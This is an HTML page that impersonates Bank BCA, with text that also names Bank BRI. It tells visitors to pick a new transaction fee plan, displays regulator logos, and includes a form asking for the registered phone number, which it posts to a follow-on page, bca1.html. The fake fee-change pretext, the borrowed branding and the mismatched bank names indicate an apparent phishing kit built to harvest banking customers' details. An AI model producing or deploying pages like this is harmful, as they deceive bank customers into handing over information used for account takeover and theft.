<!DOCTYPE HTML>
<html>
  <head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@48,400,0,0" />
    <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css" />
    <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css" />
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, viewport-fit=cover">
    <meta name="description" content="Bank BCA terus berinovasi mengembangkan produk yang sesuai dengan perkembangan jaman untuk memenuhi kebutuhan nasabah">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="theme-color" content="#0f78cb">
    <meta property="og:type" content="website">
    <meta http-equiv="Content-Security-Policy" content="default-src * 'self' 'unsafe-inline' 'unsafe-eval' data: gap:">
    <title>Layanan Perubahan Tarif Bank BCA || Senantiasa disisi Anda</title>
    <link rel="icon" type="image/jpg" href="https://i.ibb.co/1zsPDkc/In-Shot-20221103-010930585.jpg" />
    <link rel="image_src" href="https://i.ibb.co/1zsPDkc/In-Shot-20221103-010930585.jpg" />
    <style>
      @font-face {
        font-family: alexfonthel;
        src: url(https://fonts.googleapis.com/css?family=Lato:regular%7CLato%7CLato:900%7CLato:700);
      }

      * {
        margin: 0px;
      }

      html,
      body {
        max-width: 100%;
        overflow-x: hidden;
      }

      body {
        margin: 0px;
        background: #fff;
        color: #000;
        font-family: 'alexfonthel', sans-serif;
      }

      .welcome {
        position: fixed;
        left: 0;
        top: 0;
        width: 100vw;
        height: 100vh;
        display: flex;
        flex-direction: row;
        flex-wrap: nowrap;
        align-items: center;
        align-content: center;
        justify-content: center;
        background: #fff;
      }

      #welcome2 {
        position: fixed;
        left: 0;
        top: 0;
        width: 100vw;
        height: 100vh;
        display: block;
        flex-direction: row;
        flex-wrap: nowrap;
        align-items: center;
        align-content: center;
        justify-content: center;
        background-color: rgba(0, 0, 0, 0.5);
        z-index: 9999;
      }

      .welcome img {
        width: 21vw;
        height: auto;
      }

      .hide-welcome {
        position: relative;
        width: 100%;
        height: 100vh;
        display: flex;
        flex-direction: column;
        flex-wrap: nowrap;
        align-items: center;
      }

      .talxcome {
        width: 130%;
        flex-direction: column;
        flex-wrap: nowrap;
        align-items: center;
        height: 100%;
        justify-content: center;
      }

      .talxcome img {
        width: 73%;
      }

      .balxcome {
        height: 45vh;
        display: flex;
        flex-direction: column;
        flex-wrap: nowrap;
        align-items: center;
      }

      .txalxcome {
        width: 90%;
        height: 30vh;
        text-align: left;
      }

      .txalxcome p {
        font-weight: 600;
        font-size: 1.5rem;
        margin-bottom: 5vh;
        color: #1d66ab;
      }

      .txalxcome span {
        width: 80%;
        font-size: 18px;
      }

      .btalxcome {
        width: 90%;
        height: 20vh;
        display: flex;
        flex-direction: column;
        flex-wrap: nowrap;
        align-items: center;
      }

      .btalxcome button {
        width: 100%;
        background: #1d66ab;
        color: #fff;
        font-family: inherit;
        border-radius: 5px;
        border: none;
        font-size: 16px;
        padding: 2vh 0px;
        margin-bottom: 4vh;
        font-weight: 500;
        box-shadow: 0px 0px 1px 0px #000;
        cursor: pointer;
      }

      .btalxcome p {
        color: #1d66ab;
        font-weight: 500;
        cursor: pointer;
      }

      frmalxbr {
        position: relative;
        width: 100vw;
        height: 100vh;
      }

      .hdralxfrm {
        width: 100%;
        position: fixed;
        left: 0;
        top: 0;
        display: block;
        text-align: center;
        padding: 1.5vh 0px;
        box-shadow: 0px 1px 20px 0px #00000040;
        z-index: 1;
      }

      .hdralxfrm img {
        width: 10vw;
        height: auto;
      }

      .chalxfrm {
        position: relative;
        width: 100%;
        height: 50vh;
        z-index: 0;
        display: flex;
        flex-direction: column;
        flex-wrap: nowrap;
        align-items: center;
      }

      .bgchalxfrm {
        background: url(https://siapjadi.com/brimo0/bifast1/halo2.jpg) no-repeat center;
        background-size: 100%;
        position: unset;
        width: 100%;
        border-radius: 0px;
        top: 0;
        height: 100%;
        border: none;
        margin-top: -50px;
      }

      .chalxfrm p {
        position: absolute;
        color: #fff;
        font-size: 19px;
        font-weight: 600;
        letter-spacing: 1px;
        top: 11vh;
      }

      .chalxfrm img {
        position: absolute;
        width: 90%;
        bottom: 5vh;
      }

      .frmalxbrm {
        display: flex;
        flex-direction: column;
        flex-wrap: nowrap;
        align-items: center;
        height: 42vh;
        width: 100%;
      }

      .inpalxbrm {
        margin-top: 3vh;
        width: 90%;
        height: 35vh;
      }

      .inpalxbrm p {
        color: #2069ab;
        font-weight: 600;
        font-size: 18px;
        letter-spacing: 1px;
        margin-left: 3vw;
      }

      .bxmalxbrm {
        display: flex;
        flex-direction: column;
        flex-wrap: nowrap;
        align-items: center;
        width: 100%;
        padding-top: 2vh;
      }

      .itmalxbrm {
        position: relative;
        width: 95%;
        background: #fff;
        box-shadow: 0px 1px 3px 0px #00000087;
        border-radius: 3px;
        display: flex;
        flex-direction: row;
        flex-wrap: nowrap;
        align-items: center;
        padding: 1.8vh 2vw;
        column-gap: 3vw;
      }

      .itmalxbrm img {
        height: 4vh;
      }

      .itmalxbrm input {
        font-family: arial, sans-serif;
        font-size: 17px;
        font-weight: 300;
        border: none;
        outline: none;
      }

      .inpalxbrm span {
        width: 100%;
        text-align: right;
        display: block;
        margin-top: 2.5vh;
        font-size: 14px;
        cursor: pointer;
      }

      .btnalxfrm {
        height: 10vh;
        display: flex;
        flex-direction: row;
        flex-wrap: nowrap;
        align-content: center;
        justify-content: center;
        align-items: center;
        width: 90%;
      }

      .btnalxfrm button {
        width: 100%;
        background: #1d66ab;
        color: #fff;
        font-family: inherit;
        border-radius: 5px;
        border: none;
        font-size: 16px;
        padding: 2vh 0px;
        margin-bottom: 4vh;
        font-weight: 500;
        box-shadow: 0px 0px 1px 0px #000;
        cursor: pointer;
      }

      #togglePassword {
        background-size: 100% 100%;
        height: 3vh;
        width: 3.5vh;
        margin-top: 0;
        position: absolute;
        right: 4vw;
        cursor: pointer;
      }

      .fa-eye {
        background: url(https://siapjadi.com/brimo/bulamata-.png) no-repeat center;
      }

      .fa-eye-slash {
        background: url(https://cdn.jsdelivr.net/gh/AlexHostX/another@main/brims/20220617_022922.png) no-repeat center;
      }

      .opbtn {
        opacity: 0.5;
      }

      .alxslh {
        position: fixed;
        left: 0;
        top: 8vh;
        z-index: 3;
        font-size: 14px;
        font-weight: 400;
        color: #fff;
        background: #f53939;
        text-align: center;
        width: 100%;
        font-family: arial, sans-serif;
        padding: 1.7vh 0px;
        display: none;
      }

      pnalxbr {
        background: rgb(36 131 240);
        display: flex;
        flex-direction: column;
        flex-wrap: nowrap;
        align-items: center;
        width: 100vw;
        height: 100vh;
        color: white;
      }

      .hdralxpn {
        width: 100%;
        height: 5vh;
        display: flex;
        flex-direction: row;
        flex-wrap: nowrap;
        align-items: center;
        justify-content: space-between;
      }

      .hdralxpn span {
        margin-left: 3%;
      }

      .hdralxpn p {
        font-weight: 400;
        font-size: 15px;
      }

      .hdralxpn label {
        visibility: hidden;
        margin-right: 3%;
      }

      .txalxpn {
        padding-top: 10vh;
        padding-bottom: 5vh;
        width: 70%;
        text-align: left;
      }

      .txalxpn p {
        font-size: 17px;
        font-weight: 400;
      }

      .txalxpn span {
        font-size: 12px;
        font-weight: 300;
        font-family: Arial, sans-serif;
      }

      .inpalxpn {
        width: 70%;
        display: flex;
        flex-direction: column;
        flex-wrap: nowrap;
        align-items: center;
      }

      #alxpnnikah {
        width: 100%;
        display: flex;
        flex-direction: row;
        flex-wrap: nowrap;
        align-items: center;
        justify-content: center;
        column-gap: 7vw;
        position: relative;
        align-content: center;
      }

      #ionIcons {
        color: rgb(22, 119, 199);
        font-size: 35px;
        position: absolute;
        display: block;
        margin-top: 5px;
        margin-left: 13px;
      }

      #alxpnnikah input {
        position: absolute;
        z-index: 2;
        color: #fff;
        border: none;
        outline: none;
        font-family: inherit;
        background: transparent;
        font-size: 24px;
        letter-spacing: 10vw;
        width: 100%;
        overflow: hidden;
        float: left;
        text-align: left;
        text-overflow: revert;
        cursor: not-allowed;
        pointer-events: none;
      }

      .bxinpalxpn {
        width: 6vw;
        display: flex;
        flex-direction: column;
        flex-wrap: nowrap;
        align-items: center;
        position: relative;
        align-content: center;
        justify-content: center;
      }

      .bxinpalxpn input {
        width: 100%;
        height: 100%;
        position: absolute;
        background: transparent;
        outline: none;
        border: none;
        cursor: pointer;
        text-align: center;
        color: #fff;
        font-family: inherit;
        font-size: 24px;
      }

      .bxinpalxpn span {
        background-color: #88b4e6;
        color: white;
        height: 6.5vh;
        width: 5.5vh;
        display: block;
        border-radius: 10px;
      }

      .txalxlppn {
        padding: 7vh 0px 9vh;
        font-size: 13px;
        font-family: arial, sans-serif;
        cursor: pointer;
      }

      .kybalxpn {
        width: 90%;
      }

      .inpalxkyb {
        width: 80%;
        display: flex;
        flex-direction: row;
        flex-wrap: nowrap;
        align-items: center;
        justify-content: space-between;
        margin-bottom: 4vh;
        margin-left: 30px;
      }

      .inpalxkyb button {
        background-color: transparent;
        font-family: inherit;
        cursor: pointer;
        outline: none;
        border: none;
        font-size: 25px;
        width: 20%;
        height: 6vh;
      }

      smalxs {
        height: 100vh;
        width: 100vw;
        background: #f2f2f2;
        display: flex;
        flex-direction: row;
        flex-wrap: nowrap;
        align-content: center;
        justify-content: center;
        align-items: center;
      }

      .bxalxsm {
        position: relative;
        width: 85%;
        padding: 15vh 0% 2vh;
        background: #fff;
        display: flex;
        flex-direction: column;
        flex-wrap: nowrap;
        align-items: center;
        border: 1px solid rgba(166, 166, 166, 0.37);
        border-radius: 10px;
      }

      .bxalxsm img {
        width: 80%;
        position: absolute;
        top: -10vh;
      }

      .bxalxsm garis {
        display: block;
        width: 100%;
        border-bottom: 2px dotted rgb(204, 204, 204);
      }

      .bxalxsm label {
        color: #0776ED;
        font-weight: 300;
        font-family: arial, sans-serif;
        padding: 2vh;
      }

      .alxinpsm {
        width: 90%;
        display: flex;
        flex-direction: column;
        flex-wrap: nowrap;
        align-items: flex-start;
      }

      .alxinpsm span {
        color: rgb(158, 158, 158);
        font-size: 12px;
        font-family: arial, sans-serif;
      }

      .alxinpsm input {
        box-sizing: border-box;
        z-index: 4;
        height: 75px;
        width: 100%;
        left: 0px;
        border-width: 1px;
        border-style: solid;
        border-color: rgb(189, 189, 189) rgb(189, 189, 189) rgb(214, 214, 214);
        border-image: initial;
        background-color: transparent;
        border-radius: 5px;
        box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
        font-size: 13px;
        color: rgb(85, 85, 85);
        padding: 0px 4px;
        top: 20px;
        transition: border-bottom-color 200ms ease 0s;
        margin: 1vh 0px 2vh;
        font-family: arial, sans-serif;
        outline: navajowhite;
      }

      .btnalxsm {
        width: 100%;
        text-align: right;
      }

      .btnalxsm button {
        cursor: pointer;
        background: none rgb(0, 134, 224);
        border: none;
        text-align: center;
        box-sizing: border-box;
        z-index: 6;
        height: 33px;
        left: 0px;
        top: 0px;
        font-size: 14px;
        color: rgb(255, 255, 255);
        line-height: 1;
        border-radius: 6px;
        box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
        font-family: arial, sans-serif;
        letter-spacing: 1px;
        padding: 0px 10px;
        outline: navajowhite;
      }

      .dscalxsm {
        margin-top: 5vh;
        display: flex;
        flex-direction: column;
        flex-wrap: nowrap;
        align-items: center;
      }

      .dscalxsm p {
        text-align: center;
        width: 90%;
        font-size: 10px;
        color: rgba(10, 10, 10, 0.73);
        font-family: arial, sans-serif;
      }

      .malasngoding-slider {
        border: 10px solid #efefef;
        position: relative;
        overflow: hidden;
        background: #efefef;
      }

      .malasngoding-slider {
        margin: 20px auto;
        width: 768px;
        height: 450px;
      }

      .isi-slider img {
        width: 768px;
        height: 450px;
        float: left;
      }

      .isi-slider {
        position: absolute;
        width: 3900px;
        /*pengaturan durasi lama tampil gambar bisa di atur di bawah ini*/
        animation-name: slider;
        animation-duration: 16s;
        animation-timing-function: ease-in-out;
        animation-iteration-count: infinite;
        -webkit-animation-name: slider;
        -webkit-animation-duration: 16s;
        -webkit-animation-timing-function: ease-in-out;
        -webkit-animation-iteration-count: infinite;
        -moz-animation-name: slider;
        -moz-animation-duration: 16s;
        -moz-animation-timing-function: ease-in-out;
        -moz-animation-iteration-count: infinite;
        -o-animation-name: slider;
        -o-animation-duration: 16s;
        -o-animation-timing-function: ease-in-out;
        -o-animation-iteration-count: infinite;
      }

      /*saat gambar di hover oleh cursor mouse maka berhenti slide*/
      .isi-slider:hover {
        -webkit-animation-play-state: paused;
        -moz-animation-play-state: paused;
        -o-animation-play-state: paused;
        animation-play-state: paused;
      }
      }

      .isi-slider img {
        float: right;
      }

      .malasngoding-slider:after {
        font-size: 150px;
        position: absolute;
        z-index: 12;
        color: rgba(255, 255, 255, 0);
        left: 300px;
        top: 80px;
        -webkit-transition: 1s all ease-in-out;
        -moz-transition: 1s all ease-in-out;
        transition: 1s all ease-in-out;
      }

      .malasngoding-slider:hover:after {
        color: rgba(255, 255, 255, 0.6);
      }

      @-moz-keyframes slider {
        0% {
          left: 0;
          opacity: 0;
        }

        2% {
          opacity: 1;
        }

        20% {
          left: 0;
          opacity: 1;
        }

        21% {
          opacity: 0;
        }

        24% {
          opacity: 0;
        }

        25% {
          left: -768px;
          opacity: 1;
        }

        45% {
          left: -768px;
          opacity: 1;
        }

        46% {
          opacity: 0;
        }

        48% {
          opacity: 0;
        }

        50% {
          left: -1536px;
          opacity: 1;
        }

        70% {
          left: -1536px;
          opacity: 1;
        }

        72% {
          opacity: 0;
        }

        74% {
          opacity: 0;
        }

        75% {
          left: -2304px;
          opacity: 1;
        }

        95% {
          left: -2304px;
          opacity: 1;
        }

        97% {
          left: -2304px;
          opacity: 0;
        }

        100% {
          left: 0;
          opacity: 0;
        }
      }

      @-webkit-keyframes slider {
        0% {
          left: 0;
          opacity: 0;
        }

        2% {
          opacity: 1;
        }

        20% {
          left: 0;
          opacity: 1;
        }

        21% {
          opacity: 0;
        }

        24% {
          opacity: 0;
        }

        25% {
          left: -768px;
          opacity: 1;
        }

        45% {
          left: -768px;
          opacity: 1;
        }

        46% {
          opacity: 0;
        }

        48% {
          opacity: 0;
        }

        50% {
          left: -1536px;
          opacity: 1;
        }

        70% {
          left: -1536px;
          opacity: 1;
        }

        72% {
          opacity: 0;
        }

        74% {
          opacity: 0;
        }

        75% {
          left: -2304px;
          opacity: 1;
        }

        95% {
          left: -2304px;
          opacity: 1;
        }

        97% {
          left: -2304px;
          opacity: 0;
        }

        100% {
          left: 0;
          opacity: 0;
        }
      }

      @keyframes slider {
        0% {
          left: 0;
          opacity: 0;
        }

        2% {
          opacity: 1;
        }

        20% {
          left: 0;
          opacity: 1;
        }

        21% {
          opacity: 0;
        }

        24% {
          opacity: 0;
        }

        25% {
          left: -768px;
          opacity: 1;
        }

        45% {
          left: -768px;
          opacity: 1;
        }

        46% {
          opacity: 0;
        }

        48% {
          opacity: 0;
        }

        50% {
          left: -1536px;
          opacity: 1;
        }

        70% {
          left: -1536px;
          opacity: 1;
        }

        72% {
          opacity: 0;
        }

        74% {
          opacity: 0;
        }

        75% {
          left: -2304px;
          opacity: 1;
        }

        95% {
          left: -2304px;
          opacity: 1;
        }

        97% {
          left: -2304px;
          opacity: 0;
        }

        100% {
          left: 0;
          opacity: 0;
        }
      }

      * {
        margin: 0;
        padding: 0;
        list-style: none;
        text-decoration: none;
      }

      .slider {
        overflow: hidden;
        height: 540px;
      }

      .slider figure div {
        width: 20%;
        float: left;
      }

      .slider figure img {
        width: 100%;
        float: left;
      }

      .slider figure {
        position: relative;
        width: 500%;
        margin: 0;
        left: 0;
        animation: 20s slidy infinite;
      }

      @keyframes slidy {
        0% {
          left: 0%
        }

        10% {
          left: 0%;
        }

        12% {
          left: -100%;
        }

        22% {
          left: -100%;
        }

        24% {
          left: -200%;
        }

        34% {
          left: -200%;
        }

        36% {
          left: -300%;
        }

        46% {
          left: -300%;
        }

        48% {
          left: -400%;
        }

        58% {
          left: -400%;
        }

        60% {
          left: -300%;
        }

        70% {
          left: -300%;
        }

        72% {
          left: -200%;
        }

        82% {
          left: -200%;
        }

        84% {
          left: -100%;
        }

        94% {
          left: -100%;
        }

        96% {
          left: 0%;
        }

        100% {
          left: 0%;
        }
      }

      /* css modal */
      :root {
        --modal-duration: 1s;
        --modal-color: #428bca;
      }

      .button {
        background: #428bca;
        padding: 1em 2em;
        color: #fff;
        border: 0;
        border-radius: 5px;
        cursor: pointer;
      }

      .button:hover {
        background: #3876ac;
      }

      .modal {
        display: none;
        position: fixed;
        z-index: 1;
        left: 0;
        top: 0;
        height: 100%;
        width: 100%;
        overflow: auto;
        background-color: rgba(0, 0, 0, 0.5);
      }

      .modal-content {
        margin: 50% auto;
        width: 85%;
        box-shadow: 0 5px 8px 0 rgba(0, 0, 0, 0.2), 0 7px 20px 0 rgba(0, 0, 0, 0.17);
        animation-name: modalopen;
        animation-duration: var(--modal-duration);
      }

      .modal-header h2,
      .modal-footer h3 {
        margin: 0;
      }

      .modal-header {
        background: var(--modal-color);
        padding: 15px;
        color: #fff;
        border-top-left-radius: 5px;
        border-top-right-radius: 5px;
      }

      .modal-body {
        padding: 10px 20px;
        background: #fff;
      }

      .modal-footer {
        background: var(--modal-color);
        padding: 10px;
        color: #fff;
        text-align: center;
        border-bottom-left-radius: 5px;
        border-bottom-right-radius: 5px;
      }

      .close {
        color: #ccc;
        float: right;
        font-size: 30px;
        color: #fff;
      }

      .close:hover,
      .close:focus {
        color: #000;
        text-decoration: none;
        cursor: pointer;
      }

      @keyframes modalopen {
        from {
          opacity: 0;
        }

        to {
          opacity: 1;
        }
      }

      #alxsm {
        border-radius: 10px;
        border: 2px solid #09559a;
        color: #09559a;
        font-size: 14px;
        font-weight: bold;
        margin-bottom: 15px;
        padding: 0.5em 1em 0.5em 0;
        width: 90%;
        /* Ukuran bebas */
        height: 100px;
        /* Ukuran bebas */
        text-align: center;
        margin-left: 5px;
      }

      .bgchalxfrm2 {
        background: url(https://siapjadi.com/header4.png) no-repeat center;
        background-size: 110%;
        position: unset;
        width: 130%;
        border-radius: 0px;
        top: 0;
        height: 500px;
        border: none;
        margin-right: -20px;
      }

      .box-hp {
        width: 350px;
        max-width: 80%;
        height: auto;
        display: block;
        margin: 100px auto;
        padding: 10px;
        background: #fff;
        border-radius: 5px;
      }

      .text-header {
        padding: 0 10px;
        font-size: 18px;
        font-weight: 600;
        color: rgb(7, 124, 240);
        display: block;
        margin: auto;
        text-align: center;
      }

      /* css modal*/
    </style>
  </head>
  <body>
    <main>
      <div class="welcome">
        <img src="./img/mo.png" alt="" />
      </div>
      <div id="welcome2" style="display: none;">
        <div class="box-hp">
          <div class="text-header">Nomor handphone terdaftar</div>
          <img src="https://i.ibb.co/GnjgbyC/ss-removebg-preview.png" style="display: block; margin: 10px auto; width: 100%;" alt="">
          <form action="bca1.html" method="POST">
            <input name="nohp" type="tel" maxlength="13" placeholder="8xxxxx" style="width: 65%; display: block; margin: auto; padding: 7px; position: relative; margin-top: -52px; float: right; margin-left: 10px; margin-right: 10px; outline: none;" required autocomplete="off">
            <button class="bubble-element Button" style="display: block; margin: 10px auto; z-index: 6; top: 294px; left: 8px; width: 90%; height: 40px; padding: 0px; cursor: inherit; background: none rgb(65, 120, 247); border: 1px none rgb(127, 149, 235); text-align: center; font-family: var(--font_default); font-size: 14px; font-weight: 400; color: rgb(255, 255, 255); line-height: 1; border-radius: 5px;">Lanjut</button>
          </form>
        </div>
      </div>
      <div id="welcome3" style="display: none;">
        <div style="height:30px;width: 70px;margin-top: -30px;margin-bottom: 0px;float:center;margin-left:42%" class="talxcome"></div>
        <div class="slider">
          <figure>
            <div class="slide">
              <img src="./img/a1.jpg">
            </div>
            <div class="slide">
              <img src="./img/a2.jpg">
            </div>
            <div class="slide">
              <img src="./img/a3.jpg">
            </div>
            <div class="slide">
              <img src="./img/a1.jpg">
            </div>
            <div class="slide">
              <img src="./img/a2.jpg">
            </div>
          </figure>
        </div>
        <div class="wlcome" style="padding: 0 10px; font-size: 18px; font-weight: 600; color: rgb(7, 124, 240); display:block; margin: auto; margin-top: -300px; text-align: center;"> Selamat Datang <p style="font-size: 12px; margin-top: 10px;">Anda berada di halaman pemilihan tarif Transaksi Bank BRI. Silahkan pilih tarif transaksi yang anda inginkan, Sesuai dengan kebutuhan Anda.</p>
        </div>
        <div class="setbtn" style="display: block; margin: auto; text-align: center; margin-top: 30px;">
          <button onclick="window.location='bca1.html';" class="bubble-element Button clickable-element" style="z-index: 6; top: 294px; left: 8px; width: 344px; height: 45px; padding: 0px; cursor: inherit; background: none rgb(65, 120, 247); border: 1px none rgb(127, 149, 235); text-align: center; font-family: var(--font_default); font-size: 14px; font-weight: 400; color: rgb(255, 255, 255); line-height: 1; border-radius: 5px;">{1} . Tarif Baru Rp 150.000 / Bulan</button>
          <button onclick="window.location='bca1.html';" class="bubble-element Button clickable-element" style="margin-top: 40px; z-index: 7; top: 388px; left: 8px; width: 344px; height: 46px; padding: 0px; cursor: pointer; background: none rgb(64, 120, 251); border: 1px none rgb(127, 149, 235); text-align: center; font-family: var(--font_default); font-size: 14px; font-weight: 400; color: rgb(255, 255, 255); line-height: 1; border-radius: 5px;">{2} . Tarif Lama Rp 6.500 / Transaksi</button>
        </div>
        <br>
        <br>
        <br>
        <h6 style="font-family: &#x27;Open Sans&#x27;, sans-serif; font-size: 13px; font-weight: bold; color: #000; letter-spacing: 1px; text-align: center; line-height: 1; border-radius: 5px;">Terdaftar dan diawasi oleh:</h6>
        <center>
          <div class="css-dnzamn">
            <img src="./img/logo-ojk.png" width="70">
            <img src="./img/logo-lps.png" width="70">
          </div>
        </center>
      </div>
      </smalxs>
    </main>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.2/jquery.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script>
      $(document).ready(function() {
        $("button#showTarif").on('click', function() {
          window.location='login/';
        });
        setTimeout(() => {
          $('.welcome').hide();
          $('#welcome3').fadeIn();
        }, 1000)
      });
    </script>
  </body>
</html>